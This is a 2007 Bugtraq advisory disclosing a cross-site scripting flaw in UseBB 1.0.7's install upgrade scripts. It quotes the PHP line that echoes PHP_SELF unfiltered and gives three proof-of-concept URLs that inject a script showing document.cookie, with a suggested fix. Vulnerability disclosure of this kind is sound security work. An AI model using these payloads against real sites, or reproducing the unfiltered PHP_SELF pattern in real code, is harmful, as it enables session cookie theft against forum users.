UseBB 1.0.x Cross Site Scripting (XSS)
Date: 20 Jul 2007 19:54:36 -0000
From: s4mi@LinuxMail.org
To: bugtraq@securityfocus.com
Subject: UseBB 1.0.x Cross Site Scripting (XSS)
X-Virus-Scanned: antivirus-gw at tyumen.ru
#############################################################
# Script...............: UseBB version: 1.0.7 #
# Script Site..........: http://www.usebb.net #
# Vulnerability........: Cross Site Scripting (XSS) #
# Acces................: Remote #
# level................: Dangerous #
# Author...............: S4mi #
# Contact..............: s4mi[at]LinuxMail.org #
#############################################################
The affected Files :
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php
vuln Code: line ~ 86
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden"
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
The variables PHP_SELF is used without filtering
PoC :
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
Solution :
filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D
Shoutz :
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
